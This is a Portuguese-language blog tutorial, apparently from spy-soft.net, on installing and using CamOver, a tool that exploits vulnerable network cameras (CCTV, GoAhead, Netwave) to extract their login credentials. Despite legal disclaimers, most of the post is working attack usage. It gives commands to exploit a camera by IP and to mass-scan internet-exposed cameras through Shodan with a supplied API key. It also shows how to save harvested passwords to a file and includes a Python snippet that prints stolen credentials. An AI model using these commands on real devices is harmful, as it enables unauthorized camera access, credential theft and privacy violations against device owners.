Hoje vamos falar sobre uma ferramenta interessante: CamOver, utilizada para explorar vulnerabilidades de câmeras de rede, obter suas senhas e realizar diversos tipos de ataques. Os ataques acontecem explorando vulnerabilidades de modelos populares de câmeras, como CCTV, GoAhead e Netwave. Abaixo, explicarei detalhadamente como instalar e usar o CamOver.
Hackeando câmeras de rede com CamOver
Este artigo é destinado exclusivamente para fins educacionais e para o aprendizado de hackers éticos. O acesso não autorizado a câmeras de rede é ilegal e considerado crime. Nem o site spy-soft.net, nem o autor são responsáveis pelas suas ações.
Funcionalidades do CamOver:
- Exploração de vulnerabilidades em modelos populares de câmeras de rede (CCTV, GoAhead, Netwave).
- Suporte a múltiplas câmeras simultaneamente, graças à funcionalidade de multithreading.
- Interface amigável para uso por linha de comando ou API.
Instalação do CamOver
Para instalar a ferramenta, basta usar o seguinte comando:
pip3 install git+https://github.com/EntySec/CamOver
Uso do CamOver
Após instalar, basta iniciar o CamOver com o comando:
camover
Parâmetros disponíveis ao iniciar o CamOver:
-h, --help            Exibe a mensagem de ajuda e sai.  
-t, --threads         Usa multithreading para acelerar o processo.  
-o OUTPUT, --output OUTPUT  Salva os resultados em um arquivo.  
-i INPUT, --input INPUT  Arquivo com endereços das câmeras.  
-a ADDRESS, --address ADDRESS  Um único endereço de câmera.  
--shodan SHODAN       Chave de API do Shodan para explorar câmeras pela internet.  
--zoomeye ZOOMEYE     Chave de API do ZoomEye para explorar câmeras pela internet.  
-p PAGES, --pages PAGES  Número de páginas a ser buscado no ZoomEye.  
Exemplo de uso:
Exploração de uma única câmera
Suponha que exista uma câmera com o endereço IP 192.168.99.100. Para verificar se ela pode ser explorada, execute o seguinte comando:
camover -a 192.168.99.100
Exploração de câmeras pela internet
Para encontrar câmeras pela internet utilizando o Shodan, execute:
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
A chave de API Shodan (
PSKINdQe1GyxGgecYz2191H2JoS9qvgD) é fornecida como exemplo. Você pode usar essa ou sua própria chave.
Exploração de câmeras a partir de um arquivo
Se você tem uma lista de endereços de câmeras em um arquivo chamado cameras.txt, pode tentar explorá-las e salvar as senhas obtidas em passwords.txt:
camover -t -i cameras.txt -o passwords.txt
Uso de API
O CamOver também fornece uma API em Python para integrar a ferramenta em seu código. O exemplo abaixo mostra como criar um objeto CamOver, explorar uma câmera por IP e exibir as credenciais obtidas:
from camover import CamOver
camover = CamOver()
creds = camover.exploit('192.168.99.100')
print(creds)
Explicação do código:
- 
from camover import CamOver: Importa a classe CamOver da biblioteca.
- 
camover = CamOver(): Cria um objeto CamOver para acessar seus métodos.
- 
creds = camover.exploit('192.168.99.100'): Usa o métodoexploitpara tentar explorar uma câmera pelo endereço IP192.168.99.100. Se for bem-sucedido, retorna as credenciais (login e senha) da câmera.
- 
print(creds): Exibe as credenciais obtidas.
Conclusão
O CamOver é uma ferramenta poderosa para explorar vulnerabilidades em câmeras de rede. Caso você se interesse por esse tema, ele pode ser um recurso valioso para aprendizado sobre segurança de redes e testes de penetração.
⚠️ Aviso legal: O uso de ferramentas como o CamOver para atividades não autorizadas é crime e pode acarretar sérias penalidades. Utilize essas informações apenas para fins legais e éticos.
 

 
    
Top comments (0)